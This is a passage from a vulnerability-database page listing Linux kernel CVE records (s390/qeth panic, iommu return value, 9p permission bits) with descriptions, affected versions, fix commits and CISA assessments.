      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/qeth: Fix kernel panic after setting hsuid\n\nSymptom:\nWhen the hsuid attribute is set for the first time on an IQD Layer3\ndevice while the corresponding network interface is already UP,\nthe kernel will try to execute a napi function pointer that is NULL.\n\nExample:\n---------------------------------------------------------------------------\n[ 2057.572696] illegal operation: 0001 ilc:1 [#1] SMP\n[ 2057.572702] Modules linked in: af_iucv qeth_l3 zfcp scsi_transport_fc sunrpc nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6\nnft_reject nft_ct nf_tables_set nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables libcrc32c nfnetlink ghash_s390 prng xts aes_s390 des_s390 de\ns_generic sha3_512_s390 sha3_256_s390 sha512_s390 vfio_ccw vfio_mdev mdev vfio_iommu_type1 eadm_sch vfio ext4 mbcache jbd2 qeth_l2 bridge stp llc dasd_eckd_mod qeth dasd_mod\n qdio ccwgroup pkey zcrypt\n[ 2057.572739] CPU: 6 PID: 60182 Comm: stress_client Kdump: loaded Not tainted 4.18.0-541.el8.s390x #1\n[ 2057.572742] Hardware name: IBM 3931 A01 704 (LPAR)\n[ 2057.572744] Krnl PSW : 0704f00180000000 0000000000000002 (0x2)\n[ 2057.572748]            R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:3 CC:3 PM:0 RI:0 EA:3\n[ 2057.572751] Krnl GPRS: 0000000000000004 0000000000000000 00000000a3b008d8 0000000000000000\n[ 2057.572754]            00000000a3b008d8 cb923a29c779abc5 0000000000000000 00000000814cfd80\n[ 2057.572756]            000000000000012c 0000000000000000 00000000a3b008d8 00000000a3b008d8\n[ 2057.572758]            00000000bab6d500 00000000814cfd80 0000000091317e46 00000000814cfc68\n[ 2057.572762] Krnl Code:#0000000000000000: 0000                illegal\n                         \u003e0000000000000002: 0000                illegal\n                          0000000000000004: 0000                illegal\n                          0000000000000006: 0000                illegal\n                          0000000000000008: 0000                illegal\n                          000000000000000a: 0000                illegal\n                          000000000000000c: 0000                illegal\n                          000000000000000e: 0000                illegal\n[ 2057.572800] Call Trace:\n[ 2057.572801] ([\u003c00000000ec639700\u003e] 0xec639700)\n[ 2057.572803]  [\u003c00000000913183e2\u003e] net_rx_action+0x2ba/0x398\n[ 2057.572809]  [\u003c0000000091515f76\u003e] __do_softirq+0x11e/0x3a0\n[ 2057.572813]  [\u003c0000000090ce160c\u003e] do_softirq_own_stack+0x3c/0x58\n[ 2057.572817] ([\u003c0000000090d2cbd6\u003e] do_softirq.part.1+0x56/0x60)\n[ 2057.572822]  [\u003c0000000090d2cc60\u003e] __local_bh_enable_ip+0x80/0x98\n[ 2057.572825]  [\u003c0000000091314706\u003e] __dev_queue_xmit+0x2be/0xd70\n[ 2057.572827]  [\u003c000003ff803dd6d6\u003e] afiucv_hs_send+0x24e/0x300 [af_iucv]\n[ 2057.572830]  [\u003c000003ff803dd88a\u003e] iucv_send_ctrl+0x102/0x138 [af_iucv]\n[ 2057.572833]  [\u003c000003ff803de72a\u003e] iucv_sock_connect+0x37a/0x468 [af_iucv]\n[ 2057.572835]  [\u003c00000000912e7e90\u003e] __sys_connect+0xa0/0xd8\n[ 2057.572839]  [\u003c00000000912e9580\u003e] sys_socketcall+0x228/0x348\n[ 2057.572841]  [\u003c0000000091514e1a\u003e] system_call+0x2a6/0x2c8\n[ 2057.572843] Last Breaking-Event-Address:\n[ 2057.572844]  [\u003c0000000091317e44\u003e] __napi_poll+0x4c/0x1d8\n[ 2057.572846]\n[ 2057.572847] Kernel panic - not syncing: Fatal exception in interrupt\n-------------------------------------------------------------------------------------------\n\nAnalysis:\nThere is one napi structure per out_q: card-\u003eqdio.out_qs[i].napi\nThe napi.poll functions are set during qeth_open().\n\nSince\ncommit 1cfef80d4c2b (\"s390/qeth: Don\u0027t call dev_close/dev_open (DOWN/UP)\")\nqeth_set_offline()/qeth_set_online() no longer call dev_close()/\ndev_open(). So if qeth_free_qdio_queues() cleared\ncard-\u003eqdio.out_qs[i].napi.poll while the network interface was UP and the\ncard was offline, they are not set again.\n\nReproduction:\nchzdev -e $devno layer2=0\nip link set dev $network_interface up\necho 0 \u003e /sys/bus/ccw\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:31.287Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8792b557eb50b986f2496156d486d0c7c85a1524"
        },
        {
          "url": "https://git.kernel.org/stable/c/10cb803aff3b11fe0bd5f274fc1c231a43e88df6"
        },
        {
          "url": "https://git.kernel.org/stable/c/e28dd1e1bf3ebb52cdb877fb359e8978a51576e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/eae0aec245712c52a3ce9c05575b541a9eef5282"
        },
        {
          "url": "https://git.kernel.org/stable/c/8a2e4d37afb8500b276e5ee903dee06f50ab0494"
        }
      ],
      "title": "s390/qeth: Fix kernel panic after setting hsuid",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36928",
    "datePublished": "2024-05-30T15:29:20.854Z",
    "dateReserved": "2024-05-30T15:25:07.069Z",
    "dateUpdated": "2025-05-04T12:56:31.287Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-40945 (GCVE-0-2024-40945)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:25 – Updated: 2025-11-03 19:30

Title

iommu: Return right value in iommu_sva_bind_device()

Summary

In the Linux kernel, the following vulnerability has been resolved: iommu: Return right value in iommu_sva_bind_device() iommu_sva_bind_device() should return either a sva bond handle or an ERR_PTR value in error cases. Existing drivers (idxd and uacce) only check the return value with IS_ERR(). This could potentially lead to a kernel NULL pointer dereference issue if the function returns NULL instead of an error pointer. In reality, this doesn't cause any problems because iommu_sva_bind_device() only returns NULL when the kernel is not configured with CONFIG_IOMMU_SVA. In this case, iommu_dev_enable_feature(dev, IOMMU_DEV_FEAT_SVA) will return an error, and the device drivers won't call iommu_sva_bind_device() at all.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/700f564758882db7c…
	https://git.kernel.org/stable/c/cf34f8f66982a36e5…
	https://git.kernel.org/stable/c/2973b8e7d127754de…
	https://git.kernel.org/stable/c/6325eab6c108fed27…
	https://git.kernel.org/stable/c/7388ae6f26c0ba95f…
	https://git.kernel.org/stable/c/61a96da9649a6b6a1…
	https://git.kernel.org/stable/c/89e8a2366e3bce584…

Impacted products

Vendor

Product

Version

Linux

Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 700f564758882db7c039dfba9443fe762561a3f8 (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < cf34f8f66982a36e5cba0d05781b21ec9606b91e (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 2973b8e7d127754de9013177c41c0b5547406998 (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 6325eab6c108fed27f60ff51852e3eac0ba23f3f (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 7388ae6f26c0ba95f70cc96bf9c5d5cb06c908b6 (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 61a96da9649a6b6a1a5d5bde9374b045fdb5c12e (git)
Affected: 26b25a2b98e45aeb40eedcedc586ad5034cbd984 , < 89e8a2366e3bce584b6c01549d5019c5cda1205e (git)

Linux

Affected: 5.2
Unaffected: 0 , < 5.2 (semver)
Unaffected: 5.4.279 , ≤ 5.4.* (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.129 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T19:30:25.132Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/700f564758882db7c039dfba9443fe762561a3f8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cf34f8f66982a36e5cba0d05781b21ec9606b91e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2973b8e7d127754de9013177c41c0b5547406998"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7388ae6f26c0ba95f70cc96bf9c5d5cb06c908b6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61a96da9649a6b6a1a5d5bde9374b045fdb5c12e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89e8a2366e3bce584b6c01549d5019c5cda1205e"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00028.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-40945",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:04:14.417698Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:25.334Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/linux/iommu.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "700f564758882db7c039dfba9443fe762561a3f8",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "cf34f8f66982a36e5cba0d05781b21ec9606b91e",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "2973b8e7d127754de9013177c41c0b5547406998",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "6325eab6c108fed27f60ff51852e3eac0ba23f3f",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "7388ae6f26c0ba95f70cc96bf9c5d5cb06c908b6",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "61a96da9649a6b6a1a5d5bde9374b045fdb5c12e",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            },
            {
              "lessThan": "89e8a2366e3bce584b6c01549d5019c5cda1205e",
              "status": "affected",
              "version": "26b25a2b98e45aeb40eedcedc586ad5034cbd984",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/linux/iommu.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.2"
            },
            {
              "lessThan": "5.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.279",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.129",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.129",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: Return right value in iommu_sva_bind_device()\n\niommu_sva_bind_device() should return either a sva bond handle or an\nERR_PTR value in error cases. Existing drivers (idxd and uacce) only\ncheck the return value with IS_ERR(). This could potentially lead to\na kernel NULL pointer dereference issue if the function returns NULL\ninstead of an error pointer.\n\nIn reality, this doesn\u0027t cause any problems because iommu_sva_bind_device()\nonly returns NULL when the kernel is not configured with CONFIG_IOMMU_SVA.\nIn this case, iommu_dev_enable_feature(dev, IOMMU_DEV_FEAT_SVA) will\nreturn an error, and the device drivers won\u0027t call iommu_sva_bind_device()\nat all."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:18:31.905Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/700f564758882db7c039dfba9443fe762561a3f8"
        },
        {
          "url": "https://git.kernel.org/stable/c/cf34f8f66982a36e5cba0d05781b21ec9606b91e"
        },
        {
          "url": "https://git.kernel.org/stable/c/2973b8e7d127754de9013177c41c0b5547406998"
        },
        {
          "url": "https://git.kernel.org/stable/c/6325eab6c108fed27f60ff51852e3eac0ba23f3f"
        },
        {
          "url": "https://git.kernel.org/stable/c/7388ae6f26c0ba95f70cc96bf9c5d5cb06c908b6"
        },
        {
          "url": "https://git.kernel.org/stable/c/61a96da9649a6b6a1a5d5bde9374b045fdb5c12e"
        },
        {
          "url": "https://git.kernel.org/stable/c/89e8a2366e3bce584b6c01549d5019c5cda1205e"
        }
      ],
      "title": "iommu: Return right value in iommu_sva_bind_device()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-40945",
    "datePublished": "2024-07-12T12:25:19.164Z",
    "dateReserved": "2024-07-12T12:17:45.588Z",
    "dateUpdated": "2025-11-03T19:30:25.132Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36964 (GCVE-0-2024-36964)

Vulnerability from cvelistv5 – Published: 2024-06-03 07:50 – Updated: 2026-01-05 10:36

Title

fs/9p: only translate RWX permissions for plain 9P2000

Summary

In the Linux kernel, the following vulnerability has been resolved: fs/9p: only translate RWX permissions for plain 9P2000 Garbage in plain 9P2000's perm bits is allowed through, which causes it to be able to set (among others) the suid bit. This was presumably not the intent since the unix extended bits are handled explicitly and conditionally on .u.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e90bc596a74bb905e…
	https://git.kernel.org/stable/c/df1962a199783ecd6…
	https://git.kernel.org/stable/c/5a605930e19f45129…
	https://git.kernel.org/stable/c/ad4f65328661392de…
	https://git.kernel.org/stable/c/ca9b5c81f0c918c63…
	https://git.kernel.org/stable/c/e55c601af3b1223a8…
	https://git.kernel.org/stable/c/157d468e34fdd3cb1…
	https://git.kernel.org/stable/c/cd25e15e57e68a6b1…

Impacted products

Vendor

Product

Version

Linux

Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < e90bc596a74bb905e0a45bf346038c3f9d1e868d (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < df1962a199783ecd66734d563caf0fedecf08f96 (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < 5a605930e19f451294bd838754f7d66c976a8a2c (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < ad4f65328661392de74e3608bb736fedf3b67e32 (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < ca9b5c81f0c918c63d73d962ed8a8e231f840bc8 (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < e55c601af3b1223a84f9f27f9cdbd2af5e203bf3 (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < 157d468e34fdd3cb1ddc07c2be32fb3b02826b02 (git)
Affected: 45089142b1497dab2327d60f6c71c40766fc3ea4 , < cd25e15e57e68a6b18dc9323047fe9c68b99290b (git)
Affected: 29a3e8657d2a2640384166e3fe29a086d235fc33 (git)

Linux

Affected: 3.1
Unaffected: 0 , < 3.1 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36964",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T18:11:48.356880Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T18:11:56.154Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.532Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e90bc596a74bb905e0a45bf346038c3f9d1e868d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/df1962a199783ecd66734d563caf0fedecf08f96"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a605930e19f451294bd838754f7d66c976a8a2c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad4f65328661392de74e3608bb736fedf3b67e32"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca9b5c81f0c918c63d73d962ed8a8e231f840bc8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e55c601af3b1223a84f9f27f9cdbd2af5e203bf3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/157d468e34fdd3cb1ddc07c2be32fb3b02826b02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cd25e15e57e68a6b18dc9323047fe9c68b99290b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/9p/vfs_inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e90bc596a74bb905e0a45bf346038c3f9d1e868d",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "df1962a199783ecd66734d563caf0fedecf08f96",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "5a605930e19f451294bd838754f7d66c976a8a2c",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "ad4f65328661392de74e3608bb736fedf3b67e32",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "ca9b5c81f0c918c63d73d962ed8a8e231f840bc8",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "e55c601af3b1223a84f9f27f9cdbd2af5e203bf3",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "157d468e34fdd3cb1ddc07c2be32fb3b02826b02",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "lessThan": "cd25e15e57e68a6b18dc9323047fe9c68b99290b",
              "status": "affected",
              "version": "45089142b1497dab2327d60f6c71c40766fc3ea4",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "29a3e8657d2a2640384166e3fe29a086d235fc33",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/9p/vfs_inode.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.1"
            },
            {
              "lessThan": "3.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "3.0.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/9p: only translate RWX permissions for plain 9P2000\n\nGarbage in plain 9P2000\u0027s perm bits is allowed through, which causes it\nto be able to set (among others) the suid bit. This was presumably not\nthe intent since the unix extended bits are handled explicitly and\nconditionally on .u."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:36.223Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e90bc596a74bb905e0a45bf346038c3f9d1e868d"
        },
        {
          "url": "https://git.kernel.org/stable/c/df1962a199783ecd66734d563caf0fedecf08f96"
        },
        {
          "url": "https://git.kernel.org/stable/c/5a605930e19f451294bd838754f7d66c976a8a2c"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad4f65328661392de74e3608bb736fedf3b67e32"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca9b5c81f0c918c63d73d962ed8a8e231f840bc8"
        },
        {
          "url": "https://git.kernel.org/stable/c/e55c601af3b1223a84f9f27f9cdbd2af5e203bf3"
        },
        {
          "url": "https://git.kernel.org/stable/c/157d468e34fdd3cb1ddc07c2be32fb3b02826b02"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd25e15e57e68a6b18dc9323047fe9c68b99290b"
        }
      ],
      "title": "fs/9p: only translate RWX permissions for plain 9P2000",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36964",
    "datePublished": "2024-06-03T07:50:01.987Z",
    "dateReserved": "2024-05-30T15:25:07.081Z",
    "dateUpdated": "2026-01-05T10:36:36.223Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36969 (GCVE-0-2024-36969)

Vulnerability from cvelistv5 – Published: 2024-06-08 12:53 – Updated: 2025-07-11 17:19

Title

drm/amd/display: Fix division by zero in setup_dsc_config

Summary

